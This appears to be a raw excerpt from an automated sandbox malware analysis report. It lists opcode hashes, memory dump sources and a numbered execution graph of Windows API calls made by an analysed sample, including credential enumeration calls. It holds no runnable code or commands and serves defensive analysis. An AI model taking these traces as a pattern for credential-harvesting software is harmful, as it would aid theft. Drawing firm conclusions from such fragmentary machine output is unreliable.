                                                                                                                                                                                                                          • String ID: InitializeCriticalSectionEx$}p[/
                                                                                                                                                                                                                          • API String ID: 2593887523-1152282549
                                                                                                                                                                                                                          • Opcode ID: e2062a9842307502cc590f8d201569a4c0008a7c86245d2a5acb6eced0605e67
                                                                                                                                                                                                                          • Instruction ID: 91fdd81e98038facb445755425dccb5a3c032fddb5ff78c2482da876e69e414b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2062a9842307502cc590f8d201569a4c0008a7c86245d2a5acb6eced0605e67
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20F05431E4122CBBDB116F50CC05EAEBFA1DB58721B404055FD25A7261DE7159319B94
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetOEMCP.KERNEL32(00000000,?,?,33E16C7C,?), ref: 33E16A1E
                                                                                                                                                                                                                          • GetACP.KERNEL32(00000000,?,?,33E16C7C,?), ref: 33E16A35
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: |l3
                                                                                                                                                                                                                          • API String ID: 0-1061531637
                                                                                                                                                                                                                          • Opcode ID: caa7120d1f836c983d4082b1f55a3059d9596c0e3081cd7bdbf94d772541cff6
                                                                                                                                                                                                                          • Instruction ID: df2fda2011976d275cfeb4bf9523fb4a7f4898056fa7ca4b9860ac4804d4ea3a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: caa7120d1f836c983d4082b1f55a3059d9596c0e3081cd7bdbf94d772541cff6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBF06D70E00219CFE700EFA8D4487AC77B4FB00339F188348E839AA5D1DB715956CB81
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Free
                                                                                                                                                                                                                          • String ID: FlsFree$}p[/
                                                                                                                                                                                                                          • API String ID: 3978063606-3988937242
                                                                                                                                                                                                                          • Opcode ID: 8ef6238a1a4009cd25e61c079472c84ae4cd98f41252aa782584df26513840e1
                                                                                                                                                                                                                          • Instruction ID: 764f8ba6fea2d9f1daaddb5bc4768fa59361bcecedd7ca0183c7218710a89f81
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ef6238a1a4009cd25e61c079472c84ae4cd98f41252aa782584df26513840e1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2E0E571F01228ABC3156FB4CC04E7FFBA0CB59A00B000199FD1567241CD714D228BD6
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Alloc
                                                                                                                                                                                                                          • String ID: FlsAlloc$}p[/
                                                                                                                                                                                                                          • API String ID: 2773662609-2033331159
                                                                                                                                                                                                                          • Opcode ID: d52ab96eee4e92f91171cda82f4729621ac39319851a061099a3414dade970d2
                                                                                                                                                                                                                          • Instruction ID: b1a0534005e29af87536993ae1a669bd74f886cf854d31ee0e94ab102f1eab67
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d52ab96eee4e92f91171cda82f4729621ac39319851a061099a3414dade970d2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33E0E531F0122CABD314AFA0CC14F6FBBA4DB58710B400098FD2966342CE7159228BD5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:6.9%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                                                          Signature Coverage:1.1%
                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                          Total number of Limit Nodes:81
                                                                                                                                                                                                                          execution_graph 40407 441819 40410 430737 40407->40410 40409 441825 40411 430756 40410->40411 40421 43076d 40410->40421 40412 430774 40411->40412 40413 43075f 40411->40413 40424 43034a 40412->40424 40428 4169a7 11 API calls 40413->40428 40416 4307ce 40417 430819 memset 40416->40417 40419 415b2c 11 API calls 40416->40419 40417->40421 40418 43077e 40418->40416 40418->40421 40422 4307fa 40418->40422 40420 4307e9 40419->40420 40420->40417 40420->40421 40421->40409 40429 4169a7 11 API calls 40422->40429 40425 43034e 40424->40425 40427 430359 40424->40427 40430 415c23 memcpy 40425->40430 40427->40418 40428->40421 40429->40421 40430->40427 37674 442ec6 19 API calls 37851 4152c6 malloc 37852 4152e2 37851->37852 37853 4152ef 37851->37853 37855 416760 11 API calls 37853->37855 37855->37852 37856 4232e8 37857 4232ef 37856->37857 37860 415b2c 37857->37860 37859 423305 37861 415b42 37860->37861 37866 415b46 37860->37866 37862 415b94 37861->37862 37863 415b5a 37861->37863 37861->37866 37867 4438b5 37862->37867 37865 415b79 memcpy 37863->37865 37863->37866 37865->37866 37866->37859 37868 4438d0 37867->37868 37874 4438c9 37867->37874 37881 415378 memcpy memcpy 37868->37881 37874->37866 37882 4466f4 37901 446904 37882->37901 37884 446700 GetModuleHandleA 37887 446710 __set_app_type __p__fmode __p__commode 37884->37887 37886 4467a4 37888 4467ac __setusermatherr 37886->37888 37889 4467b8 37886->37889 37887->37886 37888->37889 37902 4468f0 _controlfp 37889->37902 37891 4467bd _initterm __wgetmainargs _initterm 37892 44681e GetStartupInfoW 37891->37892 37893 446810 37891->37893 37895 446866 GetModuleHandleA 37892->37895 37903 41276d 37895->37903 37899 446896 exit 37900 44689d _cexit 37899->37900 37900->37893 37901->37884 37902->37891 37904 41277d 37903->37904 37946 4044a4 LoadLibraryW 37904->37946 37906 412785 37938 412789 37906->37938 37954 414b81 37906->37954 37909 4127c8 37960 412465 memset ??2@YAPAXI 37909->37960 37911 4127ea 37972 40ac21 37911->37972 37916 412813 37990 40dd07 memset 37916->37990 37917 412827 37995 40db69 memset 37917->37995 37920 412822 38016 4125b6 ??3@YAXPAX 37920->38016 37922 40ada2 _wcsicmp 37923 41283d 37922->37923 37923->37920 37926 412863 CoInitialize 37923->37926 38000 41268e 37923->38000 38020 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37926->38020 37928 41296f 38022 40b633 37928->38022 37933 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37937 412957 37933->37937 37943 4128ca 37933->37943 37937->37920 37938->37899 37938->37900 37939 4128d0 TranslateAcceleratorW 37940 412941 GetMessageW 37939->37940 37939->37943 37940->37937 37940->37939 37941 412909 IsDialogMessageW 37941->37940 37941->37943 37942 4128fd IsDialogMessageW 37942->37940 37942->37941 37943->37939 37943->37941 37943->37942 37944 41292b TranslateMessage DispatchMessageW 37943->37944 37945 41291f IsDialogMessageW 37943->37945 37944->37940 37945->37940 37945->37944 37947 4044cf GetProcAddress 37946->37947 37950 4044f7 37946->37950 37948 4044e8 FreeLibrary 37947->37948 37951 4044df 37947->37951 37949 4044f3 37948->37949 37948->37950 37949->37950 37952 404507 MessageBoxW 37950->37952 37953 40451e 37950->37953 37951->37948 37952->37906 37953->37906 37955 414b8a 37954->37955 37956 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37954->37956 38026 40a804 memset 37955->38026 37956->37909 37959 414b9e GetProcAddress 37959->37956 37962 4124e0 37960->37962 37961 412505 ??2@YAPAXI 37963 41251c 37961->37963 37965 412521 37961->37965 37962->37961 38048 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37963->38048 38037 444722 37965->38037 37971 41259b wcscpy 37971->37911 38053 40b1ab ??3@YAXPAX ??3@YAXPAX 37972->38053 37976 40ad4b 37985 40ad76 37976->37985 38077 40a9ce 37976->38077 37977 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37983 40ac5c 37977->37983 37979 40ace7 ??3@YAXPAX 37979->37983 37983->37976 37983->37977 37983->37979 37983->37985 38057 40a8d0 37983->38057 38069 4099f4 37983->38069 37984 40a8d0 7 API calls 37984->37985 38054 40aa04 37985->38054 37986 40ada2 37987 40adc9 37986->37987 37988 40adaa 37986->37988 37987->37916 37987->37917 37988->37987 37989 40adb3 _wcsicmp 37988->37989 37989->37987 37989->37988 38082 40dce0 37990->38082 37992 40dd3a GetModuleHandleW 38087 40dba7 37992->38087 37996 40dce0 3 API calls 37995->37996 37997 40db99 37996->37997 38159 40dae1 37997->38159 38173 402f3a 38000->38173 38002 412766 38002->37920 38002->37926 38003 4126d3 _wcsicmp 38004 4126a8 38003->38004 38004->38002 38004->38003 38006 41270a 38004->38006 38208 4125f8 7 API calls 38004->38208 38006->38002 38176 411ac5 38006->38176 38017 4125da 38016->38017 38018 4125f0 38017->38018 38019 4125e6 DeleteObject 38017->38019 38021 40b1ab ??3@YAXPAX ??3@YAXPAX 38018->38021 38019->38018 38020->37933 38021->37928 38023 40b640 38022->38023 38024 40b639 ??3@YAXPAX 38022->38024 38025 40b1ab ??3@YAXPAX ??3@YAXPAX 38023->38025 38024->38023 38025->37938 38027 40a83b GetSystemDirectoryW 38026->38027 38028 40a84c wcscpy 38026->38028 38027->38028 38033 409719 wcslen 38028->38033 38031 40a881 LoadLibraryW 38032 40a886 38031->38032 38032->37956 38032->37959 38034 409724 38033->38034 38035 409739 wcscat LoadLibraryW 38033->38035 38034->38035 38036 40972c wcscat 38034->38036 38035->38031 38035->38032 38036->38035 38038 444732 38037->38038 38039 444728 DeleteObject 38037->38039 38049 409cc3 38038->38049 38039->38038 38041 412551 38042 4010f9 38041->38042 38043 401130 38042->38043 38044 401134 GetModuleHandleW LoadIconW 38043->38044 38045 401107 wcsncat 38043->38045 38046 40a7be 38044->38046 38045->38043 38047 40a7d2 38046->38047 38047->37971 38047->38047 38048->37965 38052 409bfd memset wcscpy 38049->38052 38051 409cdb CreateFontIndirectW 38051->38041 38052->38051 38053->37983 38055 40aa14 38054->38055 38056 40aa0a ??3@YAXPAX 38054->38056 38055->37986 38056->38055 38058 40a8eb 38057->38058 38059 40a8df wcslen 38057->38059 38060 40a906 ??3@YAXPAX 38058->38060 38061 40a90f 38058->38061 38059->38058 38062 40a919 38060->38062 38063 4099f4 3 API calls 38061->38063 38064 40a932 38062->38064 38065 40a929 ??3@YAXPAX 38062->38065 38063->38062 38067 4099f4 3 API calls 38064->38067 38066 40a93e memcpy 38065->38066 38066->37983 38068 40a93d 38067->38068 38068->38066 38070 409a41 38069->38070 38071 4099fb malloc 38069->38071 38070->37983 38073 409a37 38071->38073 38074 409a1c 38071->38074 38073->37983 38075 409a30 ??3@YAXPAX 38074->38075 38076 409a20 memcpy 38074->38076 38075->38073 38076->38075 38078 40a9e7 38077->38078 38079 40a9dc ??3@YAXPAX 38077->38079 38081 4099f4 3 API calls 38078->38081 38080 40a9f2 38079->38080 38080->37984 38081->38080 38106 409bca GetModuleFileNameW 38082->38106 38084 40dce6 wcsrchr 38085 40dcf5 38084->38085 38086 40dcf9 wcscat 38084->38086 38085->38086 38086->37992 38107 44db70 38087->38107 38091 40dbfd 38110 4447d9 38091->38110 38094 40dc34 wcscpy wcscpy 38136 40d6f5 38094->38136 38095 40dc1f wcscpy 38095->38094 38098 40d6f5 3 API calls 38099 40dc73 38098->38099 38100 40d6f5 3 API calls 38099->38100 38101 40dc89 38100->38101 38102 40d6f5 3 API calls 38101->38102 38103 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38102->38103 38142 40da80 38103->38142 38106->38084 38108 40dbb4 memset memset 38107->38108 38109 409bca GetModuleFileNameW 38108->38109 38109->38091 38112 4447f4 38110->38112 38111 40dc1b 38111->38094 38111->38095 38112->38111 38113 444807 ??2@YAPAXI 38112->38113 38114 44481f 38113->38114 38115 444873 _snwprintf 38114->38115 38116 4448ab wcscpy 38114->38116 38149 44474a 8 API calls 38115->38149 38118 4448bb 38116->38118 38150 44474a 8 API calls 38118->38150 38120 4448a7 38120->38116 38120->38118 38121 4448cd 38151 44474a 8 API calls 38121->38151 38123 4448e2 38152 44474a 8 API calls 38123->38152 38125 4448f7 38153 44474a 8 API calls 38125->38153 38127 44490c 38154 44474a 8 API calls 38127->38154 38129 444921 38155 44474a 8 API calls 38129->38155 38131 444936 38156 44474a 8 API calls 38131->38156 38133 44494b 38157 44474a 8 API calls 38133->38157 38135 444960 ??3@YAXPAX 38135->38111 38137 44db70 38136->38137 38138 40d702 memset GetPrivateProfileStringW 38137->38138 38139 40d752 38138->38139 38140 40d75c WritePrivateProfileStringW 38138->38140 38139->38140 38141 40d758 38139->38141 38140->38141 38141->38098 38143 44db70 38142->38143 38144 40da8d memset 38143->38144 38145 40daac LoadStringW 38144->38145 38146 40dac6 38145->38146 38146->38145 38148 40dade 38146->38148 38158 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38146->38158 38148->37920 38149->38120 38150->38121 38151->38123 38152->38125 38153->38127 38154->38129 38155->38131 38156->38133 38157->38135 38158->38146 38169 409b98 GetFileAttributesW 38159->38169 38161 40daea 38162 40db63 38161->38162 38163 40daef wcscpy wcscpy GetPrivateProfileIntW 38161->38163 38162->37922 38170 40d65d GetPrivateProfileStringW 38163->38170 38165 40db3e 38171 40d65d GetPrivateProfileStringW 38165->38171 38167 40db4f 38172 40d65d GetPrivateProfileStringW 38167->38172 38169->38161 38170->38165 38171->38167 38172->38162 38209 40eaff 38173->38209 38177 411ae2 memset 38176->38177 38178 411b8f 38176->38178 38249 409bca GetModuleFileNameW 38177->38249 38190 411a8b 38178->38190 38180 411b0a wcsrchr 38181 411b22 wcscat 38180->38181 38182 411b1f 38180->38182 38250 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38181->38250 38182->38181 38184 411b67 38251 402afb 38184->38251 38188 411b7f 38307 40ea13 SendMessageW memset SendMessageW 38188->38307 38191 402afb 27 API calls 38190->38191 38192 411ac0 38191->38192 38193 4110dc 38192->38193 38194 41113e 38193->38194 38199 4110f0 38193->38199 38332 40969c LoadCursorW SetCursor 38194->38332 38196 411143 38206 40b633 ??3@YAXPAX 38196->38206 38333 444a54 38196->38333 38336 4032b4 38196->38336 38197 4110f7 _wcsicmp 38197->38199 38198 411157 38200 40ada2 _wcsicmp 38198->38200 38199->38194 38199->38197 38354 410c46 10 API calls 38199->38354 38203 411167 38200->38203 38201 4111af 38203->38201 38204 4111a6 qsort 38203->38204 38204->38201 38206->38198 38208->38004 38210 40eb10 38209->38210 38222 40e8e0 38210->38222 38213 40eb6c memcpy memcpy 38218 40ebb7 38213->38218 38214 40ebf2 ??2@YAPAXI ??2@YAPAXI 38216 40ec2e ??2@YAPAXI 38214->38216 38219 40ec65 38214->38219 38215 40d134 16 API calls 38215->38218 38216->38219 38218->38213 38218->38214 38218->38215 38219->38219 38232 40ea7f 38219->38232 38221 402f49 38221->38004 38223 40e8f2 38222->38223 38224 40e8eb ??3@YAXPAX 38222->38224 38225 40e900 38223->38225 38226 40e8f9 ??3@YAXPAX 38223->38226 38224->38223 38227 40e911 38225->38227 38228 40e90a ??3@YAXPAX 38225->38228 38226->38225 38229 40e931 ??2@YAPAXI ??2@YAPAXI 38227->38229 38230 40e921 ??3@YAXPAX 38227->38230 38231 40e92a ??3@YAXPAX 38227->38231 38228->38227 38229->38213 38230->38231 38231->38229 38233 40aa04 ??3@YAXPAX 38232->38233 38234 40ea88 38233->38234 38235 40aa04 ??3@YAXPAX 38234->38235 38236 40ea90 38235->38236 38237 40aa04 ??3@YAXPAX 38236->38237 38238 40ea98 38237->38238 38239 40aa04 ??3@YAXPAX 38238->38239 38240 40eaa0 38239->38240 38241 40a9ce 4 API calls 38240->38241 38242 40eab3 38241->38242 38243 40a9ce 4 API calls 38242->38243 38244 40eabd 38243->38244 38245 40a9ce 4 API calls 38244->38245 38246 40eac7 38245->38246 38247 40a9ce 4 API calls 38246->38247 38248 40ead1 38247->38248 38248->38221 38249->38180 38250->38184 38308 40b2cc 38251->38308 38253 402b0a 38254 40b2cc 27 API calls 38253->38254 38255 402b23 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402b3a 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402b54 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402b6b 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402b82 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402b99 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402bb0 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402bc7 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402bde 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402bf5 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402c0c 38274->38275 38276 40b2cc 27 API calls 38275->38276 38277 402c23 38276->38277 38278 40b2cc 27 API calls 38277->38278 38279 402c3a 38278->38279 38280 40b2cc 27 API calls 38279->38280 38281 402c51 38280->38281 38282 40b2cc 27 API calls 38281->38282 38283 402c68 38282->38283 38284 40b2cc 27 API calls 38283->38284 38285 402c7f 38284->38285 38286 40b2cc 27 API calls 38285->38286 38287 402c99 38286->38287 38288 40b2cc 27 API calls 38287->38288 38289 402cb3 38288->38289 38290 40b2cc 27 API calls 38289->38290 38291 402cd5 38290->38291 38292 40b2cc 27 API calls 38291->38292 38293 402cf0 38292->38293 38294 40b2cc 27 API calls 38293->38294 38295 402d0b 38294->38295 38296 40b2cc 27 API calls 38295->38296 38297 402d26 38296->38297 38298 40b2cc 27 API calls 38297->38298 38299 402d3e 38298->38299 38300 40b2cc 27 API calls 38299->38300 38301 402d59 38300->38301 38302 40b2cc 27 API calls 38301->38302 38303 402d78 38302->38303 38304 40b2cc 27 API calls 38303->38304 38305 402d93 38304->38305 38306 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38305->38306 38306->38188 38307->38178 38311 40b58d 38308->38311 38310 40b2d1 38310->38253 38312 40b5a4 GetModuleHandleW FindResourceW 38311->38312 38313 40b62e 38311->38313 38314 40b5c2 LoadResource 38312->38314 38316 40b5e7 38312->38316 38313->38310 38315 40b5d0 SizeofResource LockResource 38314->38315 38314->38316 38315->38316 38316->38313 38324 40afcf 38316->38324 38318 40b608 memcpy 38327 40b4d3 memcpy 38318->38327 38320 40b61e 38328 40b3c1 18 API calls 38320->38328 38322 40b626 38329 40b04b 38322->38329 38325 40b04b ??3@YAXPAX 38324->38325 38326 40afd7 ??2@YAPAXI 38325->38326 38326->38318 38327->38320 38328->38322 38330 40b051 ??3@YAXPAX 38329->38330 38331 40b05f 38329->38331 38330->38331 38331->38313 38332->38196 38334 444a64 FreeLibrary 38333->38334 38335 444a83 38333->38335 38334->38335 38335->38198 38337 4032c4 38336->38337 38338 40b633 ??3@YAXPAX 38337->38338 38339 403316 38338->38339 38355 44553b 38339->38355 38343 403480 38551 40368c 15 API calls 38343->38551 38345 403489 38346 40b633 ??3@YAXPAX 38345->38346 38347 403495 38346->38347 38347->38198 38348 4033a9 memset memcpy 38349 4033ec wcscmp 38348->38349 38350 40333c 38348->38350 38349->38350 38350->38343 38350->38348 38350->38349 38549 4028e7 11 API calls 38350->38549 38550 40f508 6 API calls 38350->38550 38352 403421 _wcsicmp 38352->38350 38354->38199 38356 445548 38355->38356 38357 445599 38356->38357 38552 40c768 38356->38552 38358 4455a8 memset 38357->38358 38364 4457f2 38357->38364 38635 403988 38358->38635 38367 445854 38364->38367 38737 403e2d memset memset memset memset memset 38364->38737 38418 4458aa 38367->38418 38760 403c9c memset memset memset memset memset 38367->38760 38368 4458bb memset memset 38370 414c2e 16 API calls 38368->38370 38369 4455e5 38375 445672 38369->38375 38380 44560f 38369->38380 38373 4458f9 38370->38373 38372 44595e memset memset 38378 414c2e 16 API calls 38372->38378 38379 40b2cc 27 API calls 38373->38379 38646 403fbe memset memset memset memset memset 38375->38646 38376 445a00 memset memset 38783 414c2e 38376->38783 38377 445b22 38383 445bca 38377->38383 38384 445b38 memset memset memset 38377->38384 38388 44599c 38378->38388 38389 445909 38379->38389 38391 4087b3 338 API calls 38380->38391 38381 44557a 38415 44558c 38381->38415 38832 41366b FreeLibrary 38381->38832 38382 445849 38847 40b1ab ??3@YAXPAX ??3@YAXPAX 38382->38847 38390 445c8b memset memset 38383->38390 38457 445cf0 38383->38457 38393 445bd4 38384->38393 38394 445b98 38384->38394 38397 40b2cc 27 API calls 38388->38397 38399 409d1f 6 API calls 38389->38399 38402 414c2e 16 API calls 38390->38402 38400 445621 38391->38400 38392 44589f 38848 40b1ab ??3@YAXPAX ??3@YAXPAX 38392->38848 38408 414c2e 16 API calls 38393->38408 38394->38393 38404 445ba2 38394->38404 38401 4459ac 38397->38401 38398 403335 38548 4452e5 45 API calls 38398->38548 38411 445919 38399->38411 38833 4454bf 20 API calls 38400->38833 38413 409d1f 6 API calls 38401->38413 38414 445cc9 38402->38414 38921 4099c6 wcslen 38404->38921 38405 4456b2 38835 40b1ab ??3@YAXPAX ??3@YAXPAX 38405->38835 38407 40b2cc 27 API calls 38419 445a4f 38407->38419 38421 445be2 38408->38421 38409 445d3d 38442 40b2cc 27 API calls 38409->38442 38410 445d88 memset memset memset 38425 414c2e 16 API calls 38410->38425 38849 409b98 GetFileAttributesW 38411->38849 38412 445823 38412->38382 38424 4087b3 338 API calls 38412->38424 38426 4459bc 38413->38426 38427 409d1f 6 API calls 38414->38427 38619 444b06 38415->38619 38416 445879 38416->38392 38437 4087b3 338 API calls 38416->38437 38418->38368 38443 44594a 38418->38443 38798 409d1f wcslen wcslen 38419->38798 38422 40b2cc 27 API calls 38421->38422 38431 445bf3 38422->38431 38424->38412 38434 445dde 38425->38434 38917 409b98 GetFileAttributesW 38426->38917 38436 445ce1 38427->38436 38428 445bb3 38924 445403 memset 38428->38924 38429 445680 38429->38405 38669 4087b3 memset 38429->38669 38441 409d1f 6 API calls 38431->38441 38432 445928 38432->38443 38850 40b6ef 38432->38850 38444 40b2cc 27 API calls 38434->38444 38941 409b98 GetFileAttributesW 38436->38941 38437->38416 38440 40b2cc 27 API calls 38449 445a94 38440->38449 38451 445c07 38441->38451 38452 445d54 _wcsicmp 38442->38452 38443->38372 38456 4459ed 38443->38456 38455 445def 38444->38455 38445 4459cb 38445->38456 38465 40b6ef 252 API calls 38445->38465 38803 40ae18 38449->38803 38450 44566d 38450->38364 38720 413d4c 38450->38720 38461 445389 258 API calls 38451->38461 38462 445d71 38452->38462 38527 445d67 38452->38527 38454 445665 38834 40b1ab ??3@YAXPAX ??3@YAXPAX 38454->38834 38463 409d1f 6 API calls 38455->38463 38456->38376 38456->38377 38457->38398 38457->38409 38457->38410 38458 445389 258 API calls 38458->38383 38467 445c17 38461->38467 38942 445093 23 API calls 38462->38942 38470 445e03 38463->38470 38465->38456 38466 4456d8 38472 40b2cc 27 API calls 38466->38472 38473 40b2cc 27 API calls 38467->38473 38469 44563c 38469->38454 38475 4087b3 338 API calls 38469->38475 38943 409b98 GetFileAttributesW 38470->38943 38471 40b6ef 252 API calls 38471->38398 38477 4456e2 38472->38477 38478 445c23 38473->38478 38474 445d83 38474->38398 38475->38469 38836 413fa6 _wcsicmp _wcsicmp 38477->38836 38482 409d1f 6 API calls 38478->38482 38480 445e12 38487 445e6b 38480->38487 38493 40b2cc 27 API calls 38480->38493 38485 445c37 38482->38485 38483 445aa1 38486 445b17 38483->38486 38501 445ab2 memset 38483->38501 38514 409d1f 6 API calls 38483->38514 38810 40add4 38483->38810 38815 445389 38483->38815 38824 40ae51 38483->38824 38484 4456eb 38489 4456fd memset memset memset memset 38484->38489 38490 4457ea 38484->38490 38491 445389 258 API calls 38485->38491 38918 40aebe 38486->38918 38945 445093 23 API calls 38487->38945 38837 409c70 wcscpy wcsrchr 38489->38837 38840 413d29 38490->38840 38497 445c47 38491->38497 38498 445e33 38493->38498 38495 445e7e 38500 445f67 38495->38500 38503 40b2cc 27 API calls 38497->38503 38504 409d1f 6 API calls 38498->38504 38509 40b2cc 27 API calls 38500->38509 38505 40b2cc 27 API calls 38501->38505 38507 445c53 38503->38507 38508 445e47 38504->38508 38505->38483 38506 409c70 2 API calls 38510 44577e 38506->38510 38511 409d1f 6 API calls 38507->38511 38944 409b98 GetFileAttributesW 38508->38944 38513 445f73 38509->38513 38515 409c70 2 API calls 38510->38515 38516 445c67 38511->38516 38518 409d1f 6 API calls 38513->38518 38514->38483 38519 44578d 38515->38519 38520 445389 258 API calls 38516->38520 38517 445e56 38517->38487 38523 445e83 memset 38517->38523 38521 445f87 38518->38521 38519->38490 38526 40b2cc 27 API calls 38519->38526 38520->38383 38948 409b98 GetFileAttributesW 38521->38948 38525 40b2cc 27 API calls 38523->38525 38528 445eab 38525->38528 38529 4457a8 38526->38529 38527->38398 38527->38471 38530 409d1f 6 API calls 38528->38530 38531 409d1f 6 API calls 38529->38531 38532 445ebf 38530->38532 38533 4457b8 38531->38533 38534 40ae18 9 API calls 38532->38534 38839 409b98 GetFileAttributesW 38533->38839 38544 445ef5 38534->38544 38536 4457c7 38536->38490 38538 4087b3 338 API calls 38536->38538 38537 40ae51 9 API calls 38537->38544 38538->38490 38539 445f5c 38541 40aebe FindClose 38539->38541 38540 40add4 2 API calls 38540->38544 38541->38500 38542 40b2cc 27 API calls 38542->38544 38543 409d1f 6 API calls 38543->38544 38544->38537 38544->38539 38544->38540 38544->38542 38544->38543 38546 445f3a 38544->38546 38946 409b98 GetFileAttributesW 38544->38946 38947 445093 23 API calls 38546->38947 38548->38350 38549->38352 38550->38350 38551->38345 38553 40c775 38552->38553 38949 40b1ab ??3@YAXPAX ??3@YAXPAX 38553->38949 38555 40c788 38950 40b1ab ??3@YAXPAX ??3@YAXPAX 38555->38950 38557 40c790 38951 40b1ab ??3@YAXPAX ??3@YAXPAX 38557->38951 38559 40c798 38560 40aa04 ??3@YAXPAX 38559->38560 38561 40c7a0 38560->38561 38952 40c274 memset 38561->38952 38566 40a8ab 9 API calls 38567 40c7c3 38566->38567 38568 40a8ab 9 API calls 38567->38568 38569 40c7d0 38568->38569 38981 40c3c3 38569->38981 38573 40c7e5 38574 40c877 38573->38574 38575 40c86c 38573->38575 38581 40c634 49 API calls 38573->38581 39006 40a706 38573->39006 38582 40bdb0 38574->38582 39023 4053fe 39 API calls 38575->39023 38581->38573 39213 404363 38582->39213 38585 40bf5d 39233 40440c 38585->39233 38587 40bdee 38587->38585 38590 40b2cc 27 API calls 38587->38590 38588 40bddf CredEnumerateW 38588->38587 38591 40be02 wcslen 38590->38591 38591->38585 38592 40be1e 38591->38592 38592->38585 38593 40be26 _wcsncoll 38592->38593 38596 40be7d memset 38592->38596 38597 40bea7 memcpy 38592->38597 38598 40bf11 wcschr 38592->38598 38599 40b2cc 27 API calls 38592->38599 38601 40bf43 LocalFree 38592->38601 39236 40bd5d 28 API calls 38592->39236 39237 404423 38592->39237 38593->38592 38596->38592 38596->38597 38597->38592 38597->38598 38598->38592 38600 40bef6 _wcsnicmp 38599->38600 38600->38592 38600->38598 38601->38592 38602 4135f7 39250 4135e0 38602->39250 38605 40b2cc 27 API calls 38606 41360d 38605->38606 38607 40a804 8 API calls 38606->38607 38608 413613 38607->38608 38609 41361b 38608->38609 38610 41363e 38608->38610 38611 40b273 27 API calls 38609->38611 38612 4135e0 FreeLibrary 38610->38612 38613 413625 GetProcAddress 38611->38613 38614 413643 38612->38614 38613->38610 38615 413648 38613->38615 38614->38381 38616 413658 38615->38616 38617 4135e0 FreeLibrary 38615->38617 38616->38381 38618 413666 38617->38618 38618->38381 39253 4449b9 38619->39253 38622 444c1f 38622->38357 38623 4449b9 42 API calls 38625 444b4b 38623->38625 38624 444c15 38627 4449b9 42 API calls 38624->38627 38625->38624 